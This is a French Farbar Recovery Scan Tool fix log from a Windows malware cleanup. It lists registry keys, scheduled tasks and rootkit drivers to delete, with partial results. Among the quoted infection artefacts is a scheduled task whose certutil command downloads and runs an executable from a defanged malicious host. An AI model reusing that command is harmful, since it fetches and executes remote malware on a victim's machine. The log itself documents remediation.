Résultats de correction de Farbar Recovery Scan Tool (x64) Version: 30-06-2019 Exécuté par nathan (02-07-2019 12:46:54) Run:2 Exécuté depuis C:\Users\nathan\Desktop Profils chargés: nathan (Profils disponibles: nathan) Mode d'amorçage: Normal ============================================== fixlist contenu: ***************** CreateRestorePoint: CloseProcesses: HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction HKU\S-1-5-21-3514000543-3983533879-240645468-1000\...\Run: [CloudNet] => C:\Users\nathan\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe [683008 2019-07-01] (EpicNet Inc.) [Fichier non signé] HKU\S-1-5-21-3514000543-3983533879-240645468-1000\...\MountPoints2: {1cdbc928-7ae7-11e8-8f04-309c237de986} - F:\setup.exe HKU\S-1-5-21-3514000543-3983533879-240645468-1000\...\MountPoints2: {77299983-6ef2-11e8-8724-309c237de986} - E:\setup.exe HKU\S-1-5-21-3514000543-3983533879-240645468-1000\...\MountPoints2: {7729998e-6ef2-11e8-8724-309c237de986} - F:\Install.exe HKU\S-1-5-21-3514000543-3983533879-240645468-1000\...\MountPoints2: {bc299b7e-6fe0-11e8-9ffc-309c237de986} - H:\setup.exe HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\75.0.3770.100\Installer\chrmstp.exe [2019-06-20] (Google LLC -> Google LLC) BootExecute: autocheck autochk * SmartDefragBootTime.exe GroupPolicy: Restriction - Chrome CHR HKLM\SOFTWARE\Policies\Google: Restriction DeleteKey: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Smart Defrag_is1 DeleteKey: HKCU\SOFTWARE\BDEsoft DeleteKey: HKU\S-1-5-21-3514000543-3983533879-240645468-1000\SOFTWARE\BDEsoft DeleteKey: HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers\WinRAR32 DeleteKey: HKLM\Software\Classes\CLSID\{B41DB860-8EE4-11D2-9906-E49FADC173CA} DeleteKey: HKLM\Software\Classes\Folder\ShellEx\ContextMenuHandlers\WinRAR32 DeleteKey: HKLM\Software\Classes\CLSID\{B41DB860-8EE4-11D2-9906-E49FADC173CA} DeleteValue: HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|TCP Query User{0B98273D-9B99-44A9-98D8-B41F26CE4046}D:\jeux\fifa18\fifa18.exe DeleteValue: HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|UDP Query User{21556817-0DD1-421B-ACAC-7DA2C68F5990}D:\jeux\fifa18\fifa18.exe DeleteValue: HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{ECC86769-7F66-4B10-8F5C-9236014AD6C2} DeleteValue: HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{EA422745-2A59-4210-9170-FC0F681D690D} DeleteValue: HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{B9306A65-8495-4668-896A-47A6EBC63B64} DeleteValue: HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{35C516B9-33DB-4BC7-97D5-E2FA37E346B5} DeleteValue: HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{B46674A1-E065-4ED0-B455-C03D8FCF3124} DeleteValue: HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{0DE91D78-08C0-4B2A-8131-6D960DF45E00} C:\Windows\Installer\57f7ee1.msi DeleteKey: HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers\WinRAR32 DeleteKey: HKLM\Software\Classes\Folder\ShellEx\ContextMenuHandlers\WinRAR32 unlock: C:\Windows\system32\drivers\8f00b204e9800998.sys DeleteKey: HKLM\SYSTEM\CurrentControlSet\Services\8f00b204e9800998 C:\Windows\system32\drivers\8f00b204e9800998.sys DeleteKey: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{7665F26F-D11E-4498-A63E-08137544961B DeleteKey: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{7665F26F-D11E-4498-A63E-08137544961B DeleteKey: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{7665F26F-D11E-4498-A63E-08137544961B DeleteKey: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Maintenance\{7665F26F-D11E-4498-A63E-08137544961B DeleteKey: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{7665F26F-D11E-4498-A63E-08137544961B DeleteKey: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Boot\{7665F26F-D11E-4498-A63E-08137544961B C:\Windows\System32\Tasks\csrss C:\Windows\rss\csrss.exe DeleteValue: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run|HiddenWildflower DeleteValue: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run|CloudNet C:\Users\nathan\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe DeleteValue: HKU\S-1-5-21-3514000543-3983533879-240645468-1000\Software\Microsoft\Windows\CurrentVersion\Run|HiddenWildflower DeleteValue: HKU\S-1-5-21-3514000543-3983533879-240645468-1000\Software\Microsoft\Windows\CurrentVersion\Run|CloudNet C:\Users\Administrateur\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk C:\Users\Administrateur\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk C:\Users\nathan\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk C:\Users\nathan\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk C:\Users\Public\Desktop\Google Chrome.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk DeleteKey: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\CloudNet DeleteKey: HKLM\SOFTWARE\Wow6432Node\Machiner DeleteKey: HKCU\SOFTWARE\EpicNet Inc. DeleteKey: HKU\S-1-5-21-3514000543-3983533879-240645468-1000\SOFTWARE\EpicNet Inc. C:\Users\nathan\AppData\Roaming\EpicNet Inc unlock: C:\Windows\System32\drivers\WinmonProcessMonitor.sys C:\Windows\System32\drivers\WinmonProcessMonitor.sys DeleteValue: HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{6ABD440F-1FFB-4D0C-9583-5E4424CF0274} DeleteValue: HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{C9556D39-B9A6-43C4-810C-03A9B6D109BA} DeleteValue: HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{CC591A08-D941-407D-ADD0-5C82541F4712} DeleteValue: HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{20DD73F2-E149-466F-BB93-F299F8BE0AB4} DeleteValue: HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{76C79DF7-CFB6-4C67-A9B3-BCD16935B67B} DeleteValue: HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{AE7A5805-90E9-4FFF-9ED7-938DF6241B12} DeleteValue: HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{57E7BFC8-7693-4364-BA30-22F3DF4B0FBA} DeleteValue: HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{9ABD77F7-C23E-4E51-A7F1-968BE5FF2E5E} DeleteValue: HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{C56EF7C0-D85D-4FB2-BD8D-0DBE8B57ED74} DeleteValue: HKLM\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\firewallRules|{6ABD440F-1FFB-4D0C-9583-5E4424CF0274} DeleteValue: HKLM\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\firewallRules|{C9556D39-B9A6-43C4-810C-03A9B6D109BA} DeleteValue: HKLM\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\firewallRules|{CC591A08-D941-407D-ADD0-5C82541F4712} DeleteValue: HKLM\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\firewallRules|{20DD73F2-E149-466F-BB93-F299F8BE0AB4} DeleteValue: HKLM\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\firewallRules|{76C79DF7-CFB6-4C67-A9B3-BCD16935B67B} DeleteValue: HKLM\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\firewallRules|{AE7A5805-90E9-4FFF-9ED7-938DF6241B12} DeleteValue: HKLM\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\firewallRules|{57E7BFC8-7693-4364-BA30-22F3DF4B0FBA} DeleteValue: HKLM\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\firewallRules|{9ABD77F7-C23E-4E51-A7F1-968BE5FF2E5E} DeleteValue: HKLM\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\firewallRules|{C56EF7C0-D85D-4FB2-BD8D-0DBE8B57ED74} Task: {75F6A243-14B7-4B77-B1E9-6CD40BCB2166} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://fstyline.xyz/app/app.exe C:\Users\nathan\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\nathan\AppData\Local\Temp\csrss\scheduled.exe /31340 Task: {7665F26F-D11E-4498-A63E-08137544961B} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [5161472 2019-07-01] () [Fichier non signé] Task: {F7E55B26-44E1-46ED-BC51-75E09A93BFBB} - System32\Tasks\ewSXxaflLkNov2 => C:\Windows\system32\wscript.exe "C:\ProgramData\xpekMjRorgkcLnVB\HcCoFUY.wsf" HKU\S-1-5-21-3514000543-3983533879-240645468-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKA1VtC1mRJr0-ErR1DGytAxJ2NzqtF9dPANsNo_Onure0_Fi6qpvpBxdx9emiUVWOlHKghequCMhfWmFpRBhKYPOHulyoCeZNXQ-rERvXwcj9kxg6BhDwMLSkriFhHFainxVFBHBDcoHt-kkQve9GzHO9fzvkMgAuqA2giNUmbClselIu9JNlNyhJA,&q={searchTerms} CHR HomePage: Default -> hxxp://www.funnysearching.com/ R2 WinDefender; C:\Windows\windefender.exe [0 0000-00-00] (Accès refusé) S2 yzrnpmcu; C:\Windows\SysWOW64\yzrnpmcu\jhokjsqh.exe [0 0000-00-00] () S2 AdvancedSystemCareService12; C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe [X] S3 Denuvo Kuser Data Driver 1.0.0.7; pas de ImagePath R3 Winmon; C:\Windows\System32\drivers\Winmon.sys [0 0000-00-00] () R3 WinmonFS; C:\Windows\System32\drivers\WinmonFS.sys [0 0000-00-00] (Windows (R) Win 7 DDK provider) S3 AscFileControl; \??\C:\Program Files (x86)\IObit\Advanced SystemCare\drivers\win7_amd64\AscFileControl.sys [X] S3 AscFileFilter; \??\C:\Program Files (x86)\IObit\Advanced SystemCare\drivers\win7_amd64\AscFileFilter.sys [X] S3 AscRegistryFilter; \??\C:\Program Files (x86)\IObit\Advanced SystemCare\drivers\win7_amd64\AscRegistryFilter.sys [X] S3 iobit_monitor_server; \??\C:\Program Files (x86)\IObit\Advanced SystemCare\drivers\Monitor_win7_x64.sys [X] U3 MBAMService; pas de ImagePath 2019-06-29 11:34 - 2019-07-02 09:16 - 000003184 _____ C:\Windows\System32\Tasks\csrss 2019-06-29 11:34 - 2019-06-29 11:34 - 000002890 _____ C:\Windows\System32\Tasks\ewSXxaflLkNov2 2019-06-29 11:15 - 2019-06-29 11:15 - 000000000 ____D C:\Windows\SysWOW64\yzrnpmcu 2019-06-29 11:15 C:\Windows\SysWOW64\yzrnpmcu ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Pas de fichier ShortcutWithArgument: C:\Users\nathan\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe () -> %SNP% ShortcutWithArgument: C:\Users\nathan\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe () -> %SNP% ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe () -> %SNP% ShortcutWithArgument: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe () -> %SNP% AlternateDataStreams: C:\Users\nathan\AppData\Local\Temp:$DATA​ [16] EmptyTemp: ***************** Le Point de restauration a été créé avec succès. Processus fermé avec succès. HKLM\SOFTWARE\Policies\Microsoft\Windows Defender => non trouvé(e) "HKU\S-1-5-21-3514000543-3983533879-240645468-1000\Software\Microsoft\Windows\CurrentVersion\Run\\CloudNet" => non trouvé(e) HKU\S-1-5-21-3514000543-3983533879-240645468-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{1cdbc928-7ae7-11e8-8f04-309c237de986} => non trouvé(e) HKLM\Software\Classes\CLSID\{1cdbc928-7ae7-11e8-8f04-309c237de986} => non trouvé(e) HKU\S-1-5-21-3514000543-3983533879-240645468-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{77299983-6ef2-11e8-8724-309c237de986} => non trouvé(e) HKLM\Software\Classes\CLSID\{77299983-6ef2-11e8-8724-309c237de986} => non trouvé(e) HKU\S-1-5-21-3514000543-3983533879-240645468-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{7729998e-6ef2-11e8-8724-309c237de986} => non trouvé(e) HKLM\Software\Classes\CLSID\{7729998e-6ef2-11e8-8724-309c237de986} => non trouvé(e) HKU\S-1-5-21-3514000543-3983533879-240645468-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{bc299b7e-6fe0-11e8-9ffc-309c237de986} => non trouvé(e) HKLM\Software\Classes\CLSID\{bc299b7e-6fe0-11e8-9ffc-309c237de986} => non trouvé(e) HKLM\Software\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96} => non trouvé(e) HKLM\System\CurrentControlSet\Control\Session Manager\\BootExecute => valeur restauré(es) avec succès "C:\Windows\system32\GroupPolicy\Machine" => non trouvé(e) HKLM\SOFTWARE\Policies\Google => non trouvé(e) HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Smart Defrag_is1 => non trouvé(e) HKCU\SOFTWARE\BDEsoft => non trouvé(e) HKU\S-1-5-21-3514000543-3983533879-240645468-1000\SOFTWARE\BDEsoft => non trouvé(e) HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers\WinRAR32 => non trouvé(e) HKLM\Software\Classes\CLSID\{B41DB860-8EE4-11D2-9906-E49FADC173CA} => non trouvé(e) HKLM\Software\Classes\Folder\ShellEx\ContextMenuHandlers\WinRAR32 => non trouvé(e) HKLM\Software\Classes\CLSID\{B41DB860-8EE4-11D2-9906-E49FADC173CA} => non trouvé(e) "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\TCP Query User{0B98273D-9B99-44A9-98D8-B41F26CE4046}D:\jeux\fifa18\fifa18.exe" => non trouvé(e) "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\UDP Query User{21556817-0DD1-421B-ACAC-7DA2C68F5990}D:\jeux\fifa18\fifa18.exe" => non trouvé(e) "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{ECC86769-7F66-4B10-8F5C-9236014AD6C2}" => non trouvé(e) "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{EA422745-2A59-4210-9170-FC0F681D690D}" => non trouvé(e) "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{B9306A65-8495-4668-896A-47A6EBC63B64}" => non trouvé(e) "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{35C516B9-33DB-4BC7-97D5-E2FA37E346B5}" => non trouvé(e) "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{B46674A1-E065-4ED0-B455-C03D8FCF3124}" => non trouvé(e) "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{0DE91D78-08C0-4B2A-8131-6D960DF45E00}" => non trouvé(e) "C:\Windows\Installer\57f7ee1.msi" => non trouvé(e) HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers\WinRAR32 => non trouvé(e) HKLM\Software\Classes\Folder\ShellEx\ContextMenuHandlers\WinRAR32 => non trouvé(e) "C:\Windows\system32\drivers\8f00b204e9800998.sys" => a été déverrouillé HKLM\SYSTEM\CurrentControlSet\Services\8f00b204e9800998 => impossible à supprimer, clé était peut-être protégé(e)